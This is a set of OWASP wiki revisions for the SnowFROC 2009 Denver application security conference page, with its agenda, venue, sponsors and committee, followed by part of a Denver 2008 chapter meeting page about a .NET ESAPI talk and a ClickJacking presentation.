'''This year we again present a full day, FREE multi-track conference, which will provide valuable information for managers and executives as well as developers and engineers.'''<br />
<br />
In 2008, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2009. This year we organized the conference to occur during the peak of the [http://www.google.com/search?q=colorado+skiing Colorado ski season], so that speakers can head up to the nearby mountains before and/or after the conference to enjoy some of the legendary snow.<br />
<br />
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]<br />
<br />
<br />
==Conference Location==<br />
[[Image:Denver_mountains.JPG]]<br />
<br />
This year, the conference will be held at the Tivoli Student Union in downtown Denver, CO.<br />
<br />
==Call for Presentations==<br />
The [[Front_Range_OWASP_Conference_2009_CFP|call for papers]] closed on 6 Feb 09. We received a tremendous response. Thanks to everybody who responded!<br />
<br />
<!-- ===[[SnowFROC Tentative Schedule]]=== --><br />
<br />
<br />
==Agenda and Presentations: 5 March 2009==<br />
<br />
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.<br />
<br />
{| style="width:80%" border="0" align="center"<br />
! colspan="3" align="center" style="background:#4058A0; color:white" | March 5, 2009<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 07:30-08:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Registration and Continental Breakfast in the Sponsor Expo Room<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:30-08:35 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Welcome to SnowFROC AppSec 2009 Conference <br />
''David Campbell, OWASP Denver''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:35-09:45 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Keynote: [[SnowFROC_Abstract_Grossman|"The Top Ten Hacks of 2008: What's possible, not probable"]]<br />
''Jeremiah Grossman, Whitehat Security''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 09:45-10:15 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | OWASP State of the Union<br />
''Tom Brennan, OWASP Board''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:15-10:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:30-11:15 || style="width:40%; background:#BC857A" align="left" | "[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]"<br />
''Ed Bellis, Orbitz''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Zusman|"Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations"]]<br />
''Mike Zusman, Intrepidus Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 11:15-12:00 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Paller|"A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors"]]<br />
''Alan Paller, SANS''<br />
| style="width:40%; background:#BCA57A" align="left" | "Adobe Flex, AMF 3 and BlazeDS: An Assessment" (Tool Release!) <br />
''Kevin Stadmeyer, Trustwave''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 12:00-13:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:00-13:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Peloquin|"Building an Effective Application Security Program"]]<br />
''Joey Peloquin, Fishnet Security''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Belani|"Bad Cocktail: Spear Phishing + Application Hacks"]]<br />
''Rohyt Belani, Intrepidus Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:50-14:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Byrne|"Automated vs. Manual Security: You can't filter out the stupid"]]<br />
''David Byrne, Trustwave''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Damele|"SQL injection: Not only AND 1=1"]]<br />
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 14:50-15:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:00-15:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Neucom|"Security Policy Management: Best Practices for Web Services and Application Security"]]<br />
''Ray Neucom, IBM''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Cornell_Dickson_Abstract|"Vulnerability Management in an Application Security World"]]<br />
''Dan Cornell & John Dickson, Denim Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:50-16:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Panel: Emerging Threats and Enterprise Countermeasures<br />
Moderator: John Dickson<br/><br />
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 16:30-17:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Conference Wrap Up, CTF Awards & Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 17:30-21:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | OWASP Social Gathering: Dinner and Drinks @ TBD<br />
|}<br />
<br />
<!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --><br />
<br />
==Logistics==<br />
<br />
Venue: [http://www.tivoli.org/tivoli/ Tivoli Student Union, Denver, CO USA]<br />
<br />
==Accommodations==<br />
<br />
OWASP negotiated discounted rates at one or more hotels near the conference venue. Please email snowfroc@owasp.org for questions regarding accomodation.<br />
<br />
==Transportation to the Conference==<br />
===By plane===<br />
Denver can be reached by commercial aviation through the [http://www.flydenver.com/ Denver International Airport], which is a hub for United Airlines as well as Frontier.<br />
<br />
<br />
===How to get to the venue?===<br />
See the [http://maps.google.com/maps?f=q&hl=en&q=tivoli+denver&ie=UTF8&ll=39.74785,-104.990931&spn=0.040189,0.061626&z=14&iwloc=A map].<br />
<br />
By taxi:<br />
*taxi from the airport to venue is about $50 USD<br />
<br />
<br />
==Registration and Conference Fees==<br />
<br />
Due to the hard work of our organizers and the gracious support of our sponsors, SNOWFROC will once again be a FREE CONFERENCE!!!<br />
<br />
Despite the fact that this is a free conference, we still need you to register to ensure that we don't exceed venue capacity.<br />
<br />
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]<br />
<br />
==Conference Committee==<br />
<br />
OWASP Conferences Chair: Dave Wichers - Aspect Security - dave.wichers 'at' owasp.org<br />
<br />
SNOWFROC 2009 Planning Committee Chair: Kathy Thaxton - kthaxton 'at' owasp.org<br />
<br />
Colorado Chapter Hosts:<br />
* David Campbell - OWASP Denver - dcampbell 'at' owasp.org<br />
* Eric Duprey - OWASP Denver - eduprey 'at' exploits.org<br />
<br />
Vendor Exhibition Chair: Kathy Thaxton - kthaxton 'at' owasp.org<br />
<br />
Capture the Flag Chair: Eric Duprey - eduprey 'at' exploits.org<br />
<br />
CFP Chair: David Campbell - OWASP Denver - dcampbell 'at' owasp.org<br />
<br />
==[[OWASP AppSec Conference Sponsors | Conference Sponsors]]==<br />
<br />
The following organizations are proud sponsors of this conference:<br />
*Accuvant<br />
*Breach<br />
*Business Partner Solutions<br />
*Denim Group<br />
<!-- *Dirsec --><br />
*Fishnet Security<br />
<!-- *Fortify --><br />
*IBM<br />
*Imperva<br />
*Laz<br />
*Lares<br />
<!-- *Symplify --><br />
*Trustwave<br />
*WhiteHat Security<br />
<br />
If you are interested in sponsoring this OWASP conference, please contact Kathy Thaxton at kthaxton 'at' owasp.org.<br />
<br />
<br />
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].<br />
<br />
[[Category:OWASP AppSec Conference]]</div>Edupreyhttps://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&diff=54195Front Range OWASP Conference 20092009-02-13T18:29:45Z<p>Eduprey: Undo revision 54194 by Eduprey (Talk)</p>
<hr />
<div>[[Image:SnowFROCblue.jpg]]<br />
<hr><br />
Welcome to SnowFROC, the Winter 2009 Front Range OWASP Application Security Conference!<br />
<br />
After a successful FROC in June of 2008, we are back in Denver, Colorado USA on 5 March 2009! <br />
<br />
'''This year we again present a full day, FREE multi-track conference, which will provide valuable information for managers and executives as well as developers and engineers.'''<br />
<br />
In 2008, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2009. This year we organized the conference to occur during the peak of the [http://www.google.com/search?q=colorado+skiing Colorado ski season], so that speakers can head up to the nearby mountains before and/or after the conference to enjoy some of the legendary snow.<br />
<br />
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]<br />
<br />
<br />
==Conference Location==<br />
[[Image:Denver_mountains.JPG]]<br />
<br />
This year, the conference will be held at the Tivoli Student Union in downtown Denver, CO.<br />
<br />
==Call for Presentations==<br />
The [[Front_Range_OWASP_Conference_2009_CFP|call for papers]] closed on 6 Feb 09. We received a tremendous response. Thanks to everybody who responded!<br />
<br />
<!-- ===[[SnowFROC Tentative Schedule]]=== --><br />
<br />
<br />
==Agenda and Presentations: 5 March 2009==<br />
<br />
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.<br />
<br />
{| style="width:80%" border="0" align="center"<br />
! colspan="3" align="center" style="background:#4058A0; color:white" | March 5, 2009<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 07:30-08:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Registration and Continental Breakfast in the Sponsor Expo Room<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:30-08:35 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Welcome to SnowFROC AppSec 2009 Conference <br />
''David Campbell, OWASP Denver''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:35-09:45 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Keynote: [[SnowFROC_Abstract_Grossman|"The Top Ten Hacks of 2008: What's possible, not probable"]]<br />
''Jeremiah Grossman, Whitehat Security''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 09:45-10:15 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | OWASP State of the Union<br />
''Tom Brennan, OWASP Board''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:15-10:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:30-11:15 || style="width:40%; background:#BC857A" align="left" | "[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]"<br />
''Ed Bellis, Orbitz''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Zusman|"Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations"]]<br />
''Mike Zusman, Intrepidus Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 11:15-12:00 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Paller|"A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors"]]<br />
''Alan Paller, SANS''<br />
| style="width:40%; background:#BCA57A" align="left" | "Adobe Flex, AMF 3 and BlazeDS: An Assessment" (Tool Release!) <br />
''Kevin Stadmeyer, Trustwave''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 12:00-13:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:00-13:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Peloquin|"Building an Effective Application Security Program"]]<br />
''Joey Peloquin, Fishnet Security''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Belani|"Bad Cocktail: Spear Phishing + Application Hacks"]]<br />
''Rohyt Belani, Intrepidus Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:50-14:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Byrne|"Automated vs. Manual Security: Everything in its place"]]<br />
''David Byrne, Trustwave''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Damele|"SQL injection: Not only AND 1=1"]]<br />
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 14:50-15:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:00-15:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Neucom|"Security Policy Management: Best Practices for Web Services and Application Security"]]<br />
''Ray Neucom, IBM''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Cornell_Dickson_Abstract|"Vulnerability Management in an Application Security World"]]<br />
''Dan Cornell & John Dickson, Denim Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:50-16:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Panel: Emerging Threats and Enterprise Countermeasures<br />
Moderator: John Dickson<br/><br />
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 16:30-17:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Conference Wrap Up, CTF Awards & Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 17:30-21:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | OWASP Social Gathering: Dinner and Drinks @ TBD<br />
|}<br />
<br />
<!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --><br />
<br />
==Logistics==<br />
<br />
Venue: [http://www.tivoli.org/tivoli/ Tivoli Student Union, Denver, CO USA]<br />
<br />
==Accommodations==<br />
<br />
OWASP negotiated discounted rates at one or more hotels near the conference venue. Please email snowfroc@owasp.org for questions regarding accomodation.<br />
<br />
==Transportation to the Conference==<br />
===By plane===<br />
Denver can be reached by commercial aviation through the [http://www.flydenver.com/ Denver International Airport], which is a hub for United Airlines as well as Frontier.<br />
<br />
<br />
===How to get to the venue?===<br />
See the [http://maps.google.com/maps?f=q&hl=en&q=tivoli+denver&ie=UTF8&ll=39.74785,-104.990931&spn=0.040189,0.061626&z=14&iwloc=A map].<br />
<br />
By taxi:<br />
*taxi from the airport to venue is about $50 USD<br />
<br />
<br />
==Registration and Conference Fees==<br />
<br />
Due to the hard work of our organizers and the gracious support of our sponsors, SNOWFROC will once again be a FREE CONFERENCE!!!<br />
<br />
Despite the fact that this is a free conference, we still need you to register to ensure that we don't exceed venue capacity.<br />
<br />
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]<br />
<br />
==Conference Committee==<br />
<br />
OWASP Conferences Chair: Dave Wichers - Aspect Security - dave.wichers 'at' owasp.org<br />
<br />
SNOWFROC 2009 Planning Committee Chair: Kathy Thaxton - kthaxton 'at' owasp.org<br />
<br />
Colorado Chapter Hosts:<br />
* David Campbell - OWASP Denver - dcampbell 'at' owasp.org<br />
* Eric Duprey - OWASP Denver - eduprey 'at' exploits.org<br />
<br />
Vendor Exhibition Chair: Kathy Thaxton - kthaxton 'at' owasp.org<br />
<br />
Capture the Flag Chair: Eric Duprey - eduprey 'at' exploits.org<br />
<br />
CFP Chair: David Campbell - OWASP Denver - dcampbell 'at' owasp.org<br />
<br />
==[[OWASP AppSec Conference Sponsors | Conference Sponsors]]==<br />
<br />
The following organizations are proud sponsors of this conference:<br />
*Accuvant<br />
*Breach<br />
*Business Partner Solutions<br />
*Denim Group<br />
<!-- *Dirsec --><br />
*Fishnet Security<br />
<!-- *Fortify --><br />
*IBM<br />
*Imperva<br />
*Laz<br />
*Lares<br />
<!-- *Symplify --><br />
*Trustwave<br />
*WhiteHat Security<br />
<br />
If you are interested in sponsoring this OWASP conference, please contact Kathy Thaxton at kthaxton 'at' owasp.org.<br />
<br />
<br />
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].<br />
<br />
[[Category:OWASP AppSec Conference]]</div>Edupreyhttps://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&diff=54194Front Range OWASP Conference 20092009-02-13T18:29:13Z<p>Eduprey: Undo revision 54191 by Dc (Talk)</p>
<hr />
<div>[[Image:SnowFROCblue.jpg]]<br />
<hr><br />
Welcome to SnowFROC, the Winter 2009 Front Range OWASP Application Security Conference!<br />
<br />
After a successful FROC in June of 2008, we are back in Denver, Colorado USA on 5 March 2009! <br />
<br />
This year we again present a full day, '''FREE''' multi-track conference, which will provide valuable information for managers and executives as well as developers and engineers.<br />
<br />
In 2008, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2009. This year we organized the conference to occur during the peak of the [http://www.google.com/search?q=colorado+skiing Colorado ski season], so that speakers can head up to the nearby mountains before and/or after the conference to enjoy some of the legendary snow.<br />
<br />
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]<br />
<br />
<br />
==Conference Location==<br />
[[Image:Denver_mountains.JPG]]<br />
<br />
This year, the conference will be held at the Tivoli Student Union in downtown Denver, CO.<br />
<br />
==Call for Presentations==<br />
The [[Front_Range_OWASP_Conference_2009_CFP|call for papers]] closed on 6 Feb 09. We received a tremendous response. Thanks to everybody who responded!<br />
<br />
<!-- ===[[SnowFROC Tentative Schedule]]=== --><br />
<br />
<br />
==Agenda and Presentations: 5 March 2009==<br />
<br />
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.<br />
<br />
{| style="width:80%" border="0" align="center"<br />
! colspan="3" align="center" style="background:#4058A0; color:white" | March 5, 2009<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 07:30-08:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Registration and Continental Breakfast in the Sponsor Expo Room<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:30-08:35 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Welcome to SnowFROC AppSec 2009 Conference <br />
''David Campbell, OWASP Denver''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:35-09:45 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Keynote: [[SnowFROC_Abstract_Grossman|"The Top Ten Hacks of 2008: What's possible, not probable"]]<br />
''Jeremiah Grossman, Whitehat Security''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 09:45-10:15 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | OWASP State of the Union<br />
''Tom Brennan, OWASP Board''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:15-10:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:30-11:15 || style="width:40%; background:#BC857A" align="left" | "[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]"<br />
''Ed Bellis, Orbitz''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Zusman|"Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations"]]<br />
''Mike Zusman, Intrepidus Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 11:15-12:00 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Paller|"A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors"]]<br />
''Alan Paller, SANS''<br />
| style="width:40%; background:#BCA57A" align="left" | "Adobe Flex, AMF 3 and BlazeDS: An Assessment" (Tool Release!) <br />
''Kevin Stadmeyer, Trustwave''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 12:00-13:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:00-13:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Peloquin|"Building an Effective Application Security Program"]]<br />
''Joey Peloquin, Fishnet Security''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Belani|"Bad Cocktail: Spear Phishing + Application Hacks"]]<br />
''Rohyt Belani, Intrepidus Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:50-14:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Byrne|"Automated vs. Manual Security: Choosing the right tool for the job"]]<br />
''David Byrne, Trustwave''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Damele|"SQL injection: Not only AND 1=1"]]<br />
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 14:50-15:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:00-15:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Neucom|"Security Policy Management: Best Practices for Web Services and Application Security"]]<br />
''Ray Neucom, IBM''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Cornell_Dickson_Abstract|"Vulnerability Management in an Application Security World"]]<br />
''Dan Cornell & John Dickson, Denim Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:50-16:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Panel: Emerging Threats and Enterprise Countermeasures<br />
Moderator: John Dickson<br/><br />
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 16:30-17:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Conference Wrap Up, CTF Awards & Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 17:30-21:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | OWASP Social Gathering: Dinner and Drinks @ TBD<br />
|}<br />
<br />
<!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --><br />
<br />
==Logistics==<br />
<br />
Venue: [http://www.tivoli.org/tivoli/ Tivoli Student Union, Denver, CO USA]<br />
<br />
==Accommodations==<br />
<br />
OWASP negotiated discounted rates at one or more hotels near the conference venue. Please email snowfroc@owasp.org for questions regarding accomodation.<br />
<br />
==Transportation to the Conference==<br />
===By plane===<br />
Denver can be reached by commercial aviation through the [http://www.flydenver.com/ Denver International Airport], which is a hub for United Airlines as well as Frontier.<br />
<br />
<br />
===How to get to the venue?===<br />
See the [http://maps.google.com/maps?f=q&hl=en&q=tivoli+denver&ie=UTF8&ll=39.74785,-104.990931&spn=0.040189,0.061626&z=14&iwloc=A map].<br />
<br />
By taxi:<br />
*taxi from the airport to venue is about $50 USD<br />
<br />
<br />
==Registration and Conference Fees==<br />
<br />
Due to the hard work of our organizers and the gracious support of our sponsors, SNOWFROC will once again be a FREE CONFERENCE!!!<br />
<br />
Despite the fact that this is a free conference, we still need you to register to ensure that we don't exceed venue capacity.<br />
<br />
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]<br />
<br />
==Conference Committee==<br />
<br />
OWASP Conferences Chair: Dave Wichers - Aspect Security - dave.wichers 'at' owasp.org<br />
<br />
SNOWFROC 2009 Planning Committee Chair: Kathy Thaxton - kthaxton 'at' owasp.org<br />
<br />
Colorado Chapter Hosts:<br />
* David Campbell - OWASP Denver - dcampbell 'at' owasp.org<br />
* Eric Duprey - OWASP Denver - eduprey 'at' exploits.org<br />
<br />
Vendor Exhibition Chair: Kathy Thaxton - kthaxton 'at' owasp.org<br />
<br />
Capture the Flag Chair: Eric Duprey - eduprey 'at' exploits.org<br />
<br />
CFP Chair: David Campbell - OWASP Denver - dcampbell 'at' owasp.org<br />
<br />
==[[OWASP AppSec Conference Sponsors | Conference Sponsors]]==<br />
<br />
The following organizations are proud sponsors of this conference:<br />
*Accuvant<br />
*Breach<br />
*Business Partner Solutions<br />
*Denim Group<br />
<!-- *Dirsec --><br />
*Fishnet Security<br />
<!-- *Fortify --><br />
*IBM<br />
*Imperva<br />
*Laz<br />
*Lares<br />
<!-- *Symplify --><br />
*Trustwave<br />
*WhiteHat Security<br />
<br />
If you are interested in sponsoring this OWASP conference, please contact Kathy Thaxton at kthaxton 'at' owasp.org.<br />
<br />
<br />
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].<br />
<br />
[[Category:OWASP AppSec Conference]]</div>Edupreyhttps://wiki.owasp.org/index.php?title=Denver_October_2008_meeting&diff=44358Denver October 2008 meeting2008-10-22T04:29:39Z<p>Eduprey: </p>
<hr />
<div>=== Centralized Security Functionality In a .NET World – The OWASP .NET ESAPI Project ===<br />
<br />
[https://www.owasp.org/images/e/e3/OWASP_.NET_ESAPI.zip Slide Deck]<br />
<br />
The Enterprise Security Application Programming Interface, or ESAPI, is a one-stop security shop for developers looking to implement security mechanisms in their code. The brainchild of Jeff Williams, one of the founders of OWASP, the ESAPI is an open source project that has gained traction with organizations looking to implement secure applications using tried and tested code that is also well organized and consistent. It includes functionality for validating and encoding data, authenticating and authorizing users, logging, error handling, and more. The API includes a Java reference implementation that can be extended to allow any organization to integrate security functionality into their Java/JEE applications.<br />
<br />
But what about .NET? Many organizations are banking on the powerful Microsoft programming framework to help them deliver robust and secure software. However, like Java, .NET tends to leave it up to the end-user programmers to get security code right. The OWASP .NET ESAPI project intends to help .NET developers avoid introducing security vulnerabilities into their code by providing a full port of the original ESAPI project from Java to C#.<br />
<br />
This talk will explore the gains, gripes, and gotchas of converting the ESAPI to .NET from the .NET ESAPI project lead himself. It will discuss features of the .NET frameworks security model, key differences between the Java and .NET platforms, and ASP.NET web security issues. Additionally, future ideas for .NET specific functionality will be proposed and discussed. Participation and feedback from the attendees is expected and encouraged.<br />
<br />
=== Speaker: Alex Smolen of Foundstone ===<br />
=== Alex Smolen of Foundstone ===<br />
<br />
Alex Smolen is a Software Security Consultant at Foundstone, where he provides security consulting services to clients to help find, fix, and prevent security vulnerabilities in enterprise software. His duties include threat modeling, code review, penetration testing, and secure software development lifecycle (S-SDLC) design and implementation. He is also an instructor for the Writing Secure Code, Building Secure Software, and Ultimate Web Hacking courses. <br />
<br />
Experience <br />
Alex has been working in software development for a decade and has participated in and led several development projects in ASP.NET, Java, and Ruby on Rails. His primary interests include the integration of security into software development life cycles, evaluating the business impact of information security, and the security of emerging technologies. Alex is a contributing member of the software security community and has participated in several open-source security projects. <br />
<br />
Prior to joining Foundstone, Alex was the Security Solutions Manager at Parasoft Corporation, <br />
where he led the development of tools and methodologies for helping clients ensure application <br />
security from the ground up. <br />
<br />
Notable Accomplishments <br />
Alex is one of 24 recipients worldwide of the Microsoft MVP Award for Visual Developer, Security <br />
Alex has spoken at the following conferences: <br />
• Enterprise Architect Summit, 2005 <br />
<br />
• Better Software, 2005 <br />
<br />
• OWASP Conference, 2005 <br />
<br />
• SD West, 2007 <br />
<br />
• SD Best Practices, 2007 <br />
<br />
Alex has published the following articles: <br />
• Enterprise Architect, “Is Your Application Security Up to Spec?” <br />
• Java Developers Journal, “How to Create Secure Web Applications With Struts” <br />
<br />
Alex is the author of [http://www.foundstone.com/us/resources/proddesc/hacmecasino.htm Hacme Casino], available on Foundstone’s web site. <br />
<br />
Professional Education <br />
<br />
Alex graduated from the University of California, Berkeley, with a BS in Electrical Engineering and Computer Science (EECS). <br />
<br />
=== Hack of the Month: ClickJacking ===<br />
<br />
A brief introduction to Browser UI redress attacks (known as ClickJacking) was presented by Eric Duprey<br />
<br />
[https://www.owasp.org/images/2/24/0808_Denver_Clickjacking.zip Slide Deck]<br />
<br />
